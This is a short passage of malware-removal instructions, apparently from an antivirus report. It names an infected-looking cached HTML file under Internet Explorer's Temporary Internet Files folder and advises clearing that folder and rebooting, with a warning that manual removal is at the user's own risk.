C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X66G0HIG\2409490842014111013118567[1].htm (41101 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.